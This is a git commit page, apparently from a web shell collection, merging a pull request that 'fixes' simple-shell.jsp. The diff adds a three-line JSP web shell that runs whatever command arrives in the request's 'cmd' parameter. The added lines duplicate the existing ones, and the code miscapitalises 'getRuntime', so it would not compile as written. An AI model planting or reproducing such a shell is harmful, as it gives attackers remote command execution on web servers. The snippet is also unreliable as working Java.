Merge pull request #277 from noraj/patch-2

simple-shell.jsp: fix file
This commit is contained in:
g0tmi1k 2019-03-11 16:59:45 +00:00 committed by GitHub
commit ca946eefff
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -1,3 +1,3 @@
+<%
+Runtime.getruntime().exec(request.getParameter("cmd"))
+%>
<%
Runtime.getruntime().exec(request.getParameter("cmd"))
%>